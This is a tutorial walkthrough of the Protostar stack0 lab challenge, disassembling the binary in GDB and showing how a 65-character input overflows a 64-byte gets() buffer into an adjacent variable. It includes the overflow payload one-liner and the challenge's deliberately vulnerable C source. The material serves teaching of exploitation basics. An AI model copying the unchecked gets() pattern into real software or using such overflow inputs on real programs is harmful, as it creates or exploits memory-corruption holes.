This article was published on the 12th of September 2018. This article was updated on the 11th of May 2020.


The previous article explained the working of the stack and the way variables are stored on the stack. In this practical case, the stack0 challenge from Protostar will be analysed.

Protostar is a bootable ISO image with a Linux distribution (Debian), together with a set of challenges and certain tooling (e.g. Python and GDB). Most ‘modern’ safety measures have been disabled on the provided system, such as Address Space Layout Randomisation (ASLR) and Non-Executable (NX) memory.

The approach of this practical case differs from the original Protostar challenge, although the binary does not differ from the original challenge. The Protostar challenges provide the source code and the compiled binaries, after which the user has to find and exploit the weakness in each binary to complete the challenges. Using this open approach, the user can compare the source code (the binaries are written in C) and the assembly.

In this article, the analysis will be conducted without the source code. At the end of this case, a copy of the source code is embedded to use as a comparison after the whole analysis has been completed. This way, the goal of this chapter (assembly basics) is highlighted and this approach provides a better insight into the fundamental concepts that are behind the exploit. Additionally, it is good to know that the provided source code can be compiled as-is, but that the provided solution will not work due to security measures in modern operating systems and compilers. It is therefore required to use the provided Debian ISO.

After booting the ISO in a virtual machine using the provided live boot option, one can log in with the credentials user for both the username and the password. Then, one can use the command bash to use the ‘Bourne Again SHell’ instead of the default shell. Using the command ip addr, the IP address of the machine can be found. Open a terminal (or PuTTY on Windows) and use SSH to connect to the machine, where [ip] equals the IP of the virtual machine:

ssh user@[ip]

The password remains user, since you now connect onto the virtual machine from the host, instead of connecting locally. Connecting via SSH enables you to easily copy and paste data from and to the terminal, because the host’s clipboard can be used. Note that it is not required since the shared clipboard can be enabled or the user can type the commands manually instead of copying them.

The binary can be found in the /opt/protostar/bin directory. Using the file program in bash, more details can be obtained:

user@protostar:/opt/protostar/bin$ file ./stack0
./stack0: setuid ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.18, not stripped

This provides more insight. Firstly, it is a 32-bit ELF executable which is not stripped. A stripped binary, which is the default during this course, does not contain debugging symbols. These symbols, such as function names, save time when analysing a function to determine its purpose. Additionally, the setuid bit is set on this binary, which means that it runs with the privileges of the owner of the file rather than those of the user who starts it. The root user has an ID of 0, so a setuid binary that is owned by root executes as root. This won't be of any importance in this challenge, but it does illustrate how much information the file command provides.

Upon executing the program, it awaits input from the user and then prints a message:

user@protostar:/opt/protostar/bin$ ./stack0
[InputMessage]
Try again?

Note that the [InputMessage] is the place where it awaits the input before the execution continues.

GDB comes preinstalled on this system and will be the disassembler during this case. To open a file in GDB, simply provide the location of the file as the parameter in GDB:

cd /opt/protostar/bin
gdb ./stack0

To list all functions, use the info functions command. Note that gdb also has autocompletion upon pressing tab. The function naming scheme differs from the scheme in Radare2:

(gdb) info functions
All defined functions:

File stack0/stack0.c
int main(int, char**);

Non-debugging symbols:
0x080482bc  _init
0x080482fc  __gmon_start__
0x080482fc  __gmon_start__@plt
0x0804830c  gets
0x0804830c  gets@plt
0x0804831c  __libc_start_main
0x0804831c  __libc_start_main@plt
0x0804832c  puts
0x0804832c  puts@plt
0x08048340  _start
0x08048370  __do_global_dtors_aux
0x080483d0  frame_dummy
0x08048440  __libc_csu_fini
0x08048450  __libc_csu_init
0x080484aa  __i686.get_pc_thunk.bx
0x080484b0  __do_global_ctors_aux
0x080484dc  _fini

The function puts writes the provided string to the standard output, together with a trailing newline character. It is therefore logical to see the puts in the list of functions, since the Try again? string was printed during the execution of the program. Using printf in C can result in the usage of puts instead, depending on the decision of the compiler.

Another function which is worth looking at is the gets function. The manual pages that are present on most Linux distributions and on macOS provide more information regarding the usage and workings of this function (search for the manual page online if you have no access to those, or are on a different platform). To open the manual page, use the man gets command in the terminal.

FGETS(3)                 BSD Library Functions Manual                 FGETS(3)

NAME
     fgets, gets -- get a line from a stream

LIBRARY
     Standard C Library (libc, -lc)

SYNOPSIS
     #include <stdio.h>

     char *
     fgets(char * restrict str, int size, FILE * restrict stream);

     char *
     gets(char *str);

DESCRIPTION
     The fgets() function reads at most one less than the number of characters specified by size from the given stream and stores them in the string str. Reading stops when a newline character is found, at end-of-file or error. The newline, if any, is retained. If any characters are read and there is no error, a `\0' character is appended to end the string.

     The gets() function is equivalent to fgets() with an infinite size and a stream of stdin, except that the newline character (if any) is not stored in the string. It is the caller's responsibility to ensure that the input line, if any, is sufficiently short to fit in the string.

RETURN VALUES
     Upon successful completion, fgets() and gets() return a pointer to the string. If end-of-file occurs before any characters are read, they return NULL and the buffer contents remain unchanged. If an error occurs, they return NULL and the buffer contents are indeterminate. The fgets() and gets() functions do not distinguish between end-of-file and error, and callers must use feof(3) and ferror(3) to determine which occurred.

ERRORS
     [EBADF]            The given stream is not a readable stream.

     The function fgets() may also fail and set errno for any of the errors specified for the routines fflush(3), fstat(2), read(2), or malloc(3).

     The function gets() may also fail and set errno for any of the errors specified for the routine getchar(3).

SECURITY CONSIDERATIONS
     The gets() function cannot be used securely. Because of its lack of bounds checking, and the inability for the calling program to reliably determine the length of the next incoming line, the use of this function enables malicious users to arbitrarily change a running program's functionality through a buffer overflow attack. It is strongly suggested that the fgets() function be used in all cases. (See the FSA.)

SEE ALSO
     feof(3), ferror(3), fgetln(3), fgetws(3), getline(3)

STANDARDS
     The functions fgets() and gets() conform to ISO/IEC 9899:1999 (``ISO C99'').

BSD                              June 4, 1993                              BSD

Other than the description, return value and the possible errors, this manual page provides us with a key piece of information for this challenge: the security considerations. The size of the input can be bigger than the buffer in which it is stored, resulting in an overflow. This overflow occurs in the buffer, which can be stored on the heap or the stack. Therefore, additional memory locations can be overwritten.

To disassemble a function in GDB, use the disassemble command followed by the name of the function. In this case, that is disassemble main:

(gdb) disassemble main
Dump of assembler code for function main:
0x080483f4 <main+0>:    push   %ebp
0x080483f5 <main+1>:    mov    %esp,%ebp
0x080483f7 <main+3>:    and    $0xfffffff0,%esp
0x080483fa <main+6>:    sub    $0x60,%esp
0x080483fd <main+9>:    movl   $0x0,0x5c(%esp)
0x08048405 <main+17>:   lea    0x1c(%esp),%eax
0x08048409 <main+21>:   mov    %eax,(%esp)
0x0804840c <main+24>:   call   0x804830c <gets@plt>
0x08048411 <main+29>:   mov    0x5c(%esp),%eax
0x08048415 <main+33>:   test   %eax,%eax
0x08048417 <main+35>:   je     0x8048427 <main+51>
0x08048419 <main+37>:   movl   $0x8048500,(%esp)
0x08048420 <main+44>:   call   0x804832c <puts@plt>
0x08048425 <main+49>:   jmp    0x8048433 <main+63>
0x08048427 <main+51>:   movl   $0x8048529,(%esp)
0x0804842e <main+58>:   call   0x804832c <puts@plt>
0x08048433 <main+63>:   leave
0x08048434 <main+64>:   ret
End of assembler dump.

Notice how the syntax of the assembly language differs from the one that has been used in this guide so far. This is the AT&T syntax, which is a different way of writing assembly, though it describes the same instructions as the Intel syntax. To view the output in the Intel syntax, one needs to switch the disassembly-flavor in GDB to intel with the command: set disassembly-flavor intel. Then, run the disassemble main command again, which should provide the following output:

(gdb) disassemble main
Dump of assembler code for function main:
0x080483f4 <main+0>:    push   ebp
0x080483f5 <main+1>:    mov    ebp,esp
0x080483f7 <main+3>:    and    esp,0xfffffff0
0x080483fa <main+6>:    sub    esp,0x60
0x080483fd <main+9>:    mov    DWORD PTR [esp+0x5c],0x0
0x08048405 <main+17>:   lea    eax,[esp+0x1c]
0x08048409 <main+21>:   mov    DWORD PTR [esp],eax
0x0804840c <main+24>:   call   0x804830c <gets@plt>
0x08048411 <main+29>:   mov    eax,DWORD PTR [esp+0x5c]
0x08048415 <main+33>:   test   eax,eax
0x08048417 <main+35>:   je     0x8048427 <main+51>
0x08048419 <main+37>:   mov    DWORD PTR [esp],0x8048500
0x08048420 <main+44>:   call   0x804832c <puts@plt>
0x08048425 <main+49>:   jmp    0x8048433 <main+63>
0x08048427 <main+51>:   mov    DWORD PTR [esp],0x8048529
0x0804842e <main+58>:   call   0x804832c <puts@plt>
0x08048433 <main+63>:   leave
0x08048434 <main+64>:   ret
End of assembler dump.

In the first few instructions, the stack frame is set up, the stack is aligned and the stack is set up for the storage of local variables:

0x080483f4 <main+0>:    push   ebp
0x080483f5 <main+1>:    mov    ebp,esp
0x080483f7 <main+3>:    and    esp,0xfffffff0
0x080483fa <main+6>:    sub    esp,0x60

The subtraction of 0x60 is exactly what the program needs for the whole stack frame, but not necessarily the size of the variables in the main function. Subtracting more at once saves additional instructions later, thus optimising the code.
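To make the effect of these four instructions concrete, the arithmetic can be replayed outside of GDB. The sketch below is written in Python 3 and is meant to be run on the host rather than on the Protostar machine. The function name prologue and the starting value of ESP are made up for illustration: the actual value of ESP at the start of main depends on the environment.

```python
def prologue(esp_at_entry):
    """Replay the first four instructions of main on 32-bit register values."""
    esp = (esp_at_entry - 4) & 0xFFFFFFFF  # push ebp: room for the saved EBP
    ebp = esp                              # mov ebp, esp
    esp &= 0xFFFFFFF0                      # and esp, 0xfffffff0: round down to a multiple of 16
    esp = (esp - 0x60) & 0xFFFFFFFF        # sub esp, 0x60: reserve 96 bytes
    return ebp, esp


# 0xBFFFF7BC is an assumed value, chosen only to have something to calculate with.
ebp, esp = prologue(0xBFFFF7BC)
print(hex(ebp), hex(esp))
```

With the assumed starting value, the and instruction lowers ESP by 8 bytes before the 0x60 bytes are reserved. This shows why the distance between the local variables and the saved EBP cannot be read from the sub instruction alone.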

Then, the value of 0x0 (zero) is saved at ESP+0x5c:

0x080483fd <main+9>:    mov    DWORD PTR [esp+0x5c],0x0

This indicates that it is a variable, whose value is set to 0. Since the memory is already allocated on the stack with the optimised sub esp,0x60 instruction, the mov instruction saves the variable on the stack at the provided address.

Afterwards, the address of the second variable is loaded with the lea (load effective address) instruction:

0x08048405 <main+17>:   lea    eax,[esp+0x1c]
0x08048409 <main+21>:   mov    DWORD PTR [esp],eax

The lea instruction calculates the address that is described by its second operand and stores the result in its first operand, without reading from memory and without altering the registers that are used in the calculation. To illustrate this, assume that ESP equals 0x01, then the value in EAX would be 0x01+0x1c = 0x1d whilst ESP remains 0x01.

So the outcome of ESP+0x1c is saved in EAX, after which the value of EAX is written to the address that ESP points to (the top of the stack). This functions nearly the same as pushing EAX on the stack with the push EAX instruction. The reason not to use this, but rather the mov instruction, is compiler optimisation. The allocation of the memory for the stack frame was done at once, meaning that an additional allocation of 4 bytes on the stack (which happens when the push instruction is executed) would needlessly use memory. It is therefore more efficient to use the already set stack pointer and save the result in the already allocated space.

The size of the second variable equals the address of the first variable minus the address of the second variable, in which ESP can be neglected, as it appears in both addresses: 0x5c – 0x1c = 0x40 bytes, which equals 64 bytes in decimal notation.
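The same calculation can be written down as a small Python 3 sketch. The constant and function names are hypothetical, whereas the offsets are the ones from the disassembly. Note that the result is the distance between the two variables, which equals the size of the second variable only if the compiler placed no padding in between them. At this point in the analysis, that is an assumption.

```python
BUFFER_OFFSET = 0x1c    # second variable, from lea eax,[esp+0x1c]
MODIFIED_OFFSET = 0x5c  # first variable, from mov DWORD PTR [esp+0x5c],0x0
FRAME_SIZE = 0x60       # from sub esp,0x60


def lea(base, displacement):
    """Mimic lea: calculate base + displacement without touching memory."""
    return (base + displacement) & 0xFFFFFFFF


esp = 0x01  # toy value, as used in the explanation of lea
buffer_address = lea(esp, BUFFER_OFFSET)
first_variable_address = lea(esp, MODIFIED_OFFSET)

# ESP cancels out, so only the two offsets matter.
buffer_size = first_variable_address - buffer_address
bytes_left_for_first_variable = FRAME_SIZE - MODIFIED_OFFSET

print(hex(buffer_address))            # 0x1d
print(buffer_size)                    # 64
print(bytes_left_for_first_variable)  # 4
```

The 4 bytes that remain between ESP+0x5c and the end of the reserved 0x60 bytes match the DWORD that is written at main+9.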

Then the gets function is called:

0x0804840c <main+24>:   call   0x804830c <gets@plt>

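The gets function receives its parameter via the stack: the address of the buffer to write the obtained input to, which was calculated by the previously mentioned lea instruction at main+17 and placed on top of the stack at main+21. When the input of the user is received, the gets function returns a pointer to the provided buffer. In the case of an error, NULL is returned. This return value is placed in EAX, but the program does not use it: the next instruction overwrites EAX with the value of the first variable, which is located at ESP+0x5c: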

0x08048411 <main+29>:   mov    eax,DWORD PTR [esp+0x5c]

The EAX register is then compared with itself using the test instruction:

0x08048415 <main+33>:   test   eax,eax

Test performs a bit-wise logical AND operation and sets (amongst others) the Zero Flag (ZF) to 1 if the result of the AND operation is 0. If the result is not 0, the Zero Flag is set to 0, meaning it is not set.

A bit-wise logical AND operation on 0 and 0 always equals 0, which sets the Zero Flag. Since EAX is tested against itself, the result is 0 only if EAX itself equals 0. As long as the variable still holds its assigned value of 0, the flag will therefore be set. The next instruction is a conditional jump: if the Zero Flag has been set, the jump is taken.

0x08048417 <main+35>:   je     0x8048427 <main+51>

Upon taking the jump, the following instructions remain before the end of the main function is reached:

0x08048427 <main+51>:   mov    DWORD PTR [esp],0x8048529
0x0804842e <main+58>:   call   0x804832c <puts@plt>
0x08048433 <main+63>:   leave
0x08048434 <main+64>:   ret

The puts function requires a string as a parameter, which is why one can deduce that the mov instruction saves the address of a string on the stack before the call to the puts function is made. To know what string is provided to the puts function, one can use x/s [address] in GDB. The x stands for eXamine and the s requests the examined data in the form of a string. Logically, the provided address is the location which is examined. The string at 0x8048529 equals:

(gdb) x/s 0x8048529
0x8048529: "Try again?"

This is the output that is printed after the user input. If the jump is not taken, the main function ends differently:

0x08048419 <main+37>:   mov    DWORD PTR [esp],0x8048500
0x08048420 <main+44>:   call   0x804832c <puts@plt>
0x08048425 <main+49>:   jmp    0x8048433 <main+63>
[...]
0x08048433 <main+63>:   leave
0x08048434 <main+64>:   ret

Note that the […] instructions are skipped due to the unconditional jump and are therefore not executed.

Upon examining the string located at 0x8048500, the result is:

(gdb) x/s 0x8048500
0x8048500: "you have changed the 'modified' variable"

So the first variable (the one that was set to zero in the beginning) is apparently named modified and should be changed to something other than its default value (which equals 0). If the value is not equal to 0, the bit-wise logical AND operation will not set the Zero Flag and the jump will not be taken.

The modified integer, which equals 0 by default, should be altered to something other than 0. On the stack, the buffer of 64 bytes is located at a lower address than the modified integer: the buffer starts at ESP+0x1c and modified is located at ESP+0x5c. The user input is written from the start of the buffer towards higher addresses, thus in the direction of modified. The buffer is filled via a function that has no boundary checks.

From this short summary, the following approach can be deduced: provide an input bigger than the 64 byte buffer that is given to the gets function. This will also overflow into the modified variable, since it is next on the stack. Providing too many characters as input would result in a segmentation fault, as the saved return address in the stack frame would be overwritten with an invalid location.
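This approach can be tried out in a model of the stack frame before touching the binary. The Python 3 sketch below represents the 0x60 reserved bytes as a bytearray and copies the input into it without a boundary check, the way gets does. The names run_main, frame and written are hypothetical, and the model assumes the layout that was derived from the disassembly (buffer at offset 0x1c, modified at offset 0x5c). Anything above the reserved bytes is not modelled.

```python
import struct

BUFFER_OFFSET = 0x1c
MODIFIED_OFFSET = 0x5c
FRAME_SIZE = 0x60


def run_main(user_input: bytes) -> str:
    """Model main: zero `modified`, copy the input unchecked, then test `modified`."""
    frame = bytearray(FRAME_SIZE)
    struct.pack_into("<I", frame, MODIFIED_OFFSET, 0)  # mov DWORD PTR [esp+0x5c],0x0

    written = user_input + b"\x00"  # gets stores the line followed by a NUL byte
    if BUFFER_OFFSET + len(written) > FRAME_SIZE:
        raise ValueError("input would leave the modelled part of the stack")
    frame[BUFFER_OFFSET:BUFFER_OFFSET + len(written)] = written

    (modified,) = struct.unpack_from("<I", frame, MODIFIED_OFFSET)
    if modified != 0:
        return "you have changed the 'modified' variable"
    return "Try again?"


print(run_main(b"a" * 64))  # Try again?
print(run_main(b"a" * 65))  # you have changed the 'modified' variable
```

In this model, 64 characters are not enough: only the terminating NUL byte lands on modified, which leaves its value at 0.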

The buffer can be overflowed manually by entering 65 (or 66, 67 or 68) characters when the program awaits input:

user@protostar:/opt/protostar/bin$ ./stack0 aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa you have changed the 'modified' variable

Note that more characters are allowed due to the additional space that is left on the stack, but characters 65 through 68 are the exact location of the modified variable on the stack. Providing more than 79 characters still yields the message that the modified variable has been changed, whilst also causing a segmentation fault.
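Because x86 is little-endian, the first overflowing character ends up in the least significant byte of modified. The Python 3 sketch below shows the resulting value for several input lengths. The function name modified_after is hypothetical, and the sketch assumes that modified directly follows the 64 byte buffer, as derived from the disassembly. It also accounts for the terminating NUL byte that gets appends.

```python
import struct

BUFFER_SIZE = 64


def modified_after(n_chars: int) -> int:
    """Return the value of `modified` after an input of n_chars 'a' characters."""
    written = b"a" * n_chars + b"\x00"             # what gets stores in memory
    spill = written[BUFFER_SIZE:BUFFER_SIZE + 4]   # the part that lands on `modified`
    raw = bytearray(4)                             # `modified` starts out as 0
    raw[:len(spill)] = spill
    return struct.unpack("<I", bytes(raw))[0]


for n in (64, 65, 66, 67, 68):
    print(n, hex(modified_after(n)))
```

An input of exactly 64 characters leaves modified at 0, whereas 68 characters fill all four bytes with 0x61, the ASCII value of the letter a.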

Alternatively, the input can be generated with Python, which is more efficient and less prone to errors:

user@protostar:/opt/protostar/bin$ python -c 'print "a"*65' | ./stack0
you have changed the 'modified' variable
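The one-liner above uses the print statement of Python 2. As a sketch, the same input can be built with Python 3 on a system where only that version is available. The function name build_payload and its parameters are hypothetical.

```python
import sys


def build_payload(buffer_size: int = 64, overflow: int = 1, fill: bytes = b"a") -> bytes:
    """Return buffer_size + overflow filler bytes, plus the newline that ends the line for gets."""
    return fill * (buffer_size + overflow) + b"\n"


if __name__ == "__main__":
    # The payload is plain ASCII, so it can be decoded and written as text.
    sys.stdout.write(build_payload().decode("ascii"))
```

Saved under a hypothetical name such as payload.py, the output of the script can be piped into the binary in the same way as the output of the one-liner.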

The source code of the challenge, as provided by Protostar:

#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>

int main(int argc, char **argv)
{
  volatile int modified;
  char buffer[64];

  modified = 0;
  gets(buffer);

  if(modified != 0) {
      printf("you have changed the 'modified' variable\n");
  } else {
      printf("Try again?\n");
  }
}

The next article regarding the “Crash course” can be found here.

To contact me, you can e-mail me at [info][at][maxkersten][dot][nl], send me a PM on Reddit or DM me on Twitter @LibraAnalysis.